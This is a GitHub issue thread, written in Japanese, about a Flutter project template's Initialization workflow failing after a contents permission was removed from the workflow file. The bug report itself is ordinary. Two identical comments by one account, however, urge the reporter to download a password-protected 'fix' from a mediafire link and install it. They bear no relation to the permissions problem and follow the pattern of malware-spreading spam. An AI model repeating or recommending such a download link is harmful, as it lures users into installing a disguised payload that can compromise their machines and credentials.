### ISSUE TITLE
[Bug]: Initialization ワークフローの Issue 作成ジョブが失敗する

### ISSUE THREAD

**Issue by tatsutakein** [yumemi-inc/flutter-mobile-project-template#326]
### これに関する既存の Issue はありますか？

- [X] 既存の Issue はありませんでした

### 現在の動作

contents: read の権限が足りないため actions/checkout が動作せず Initialization ワークフローの Issue 作成ができない。

https://github.com/yumemi-inc/flutter-mobile-project-template/blob/05f18c952b68b530c7cb09c2513c162aa9de7eb1/.github/workflows/initialization.yaml#L22-L25

#285 で権限が不要になると思い contents: write の記載を contents: read に変更せず削除していたことが原因。

### 期待される動作

Initialization ワークフローの Issue 作成が動作する。

### 環境

```Markdown
- Commit Hash: 0153501e8487f388e99243d36f56509ea98f9def
- App Version: 1.0.0
- Platform: iOS 17.2.1, Android 14 API level 34
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
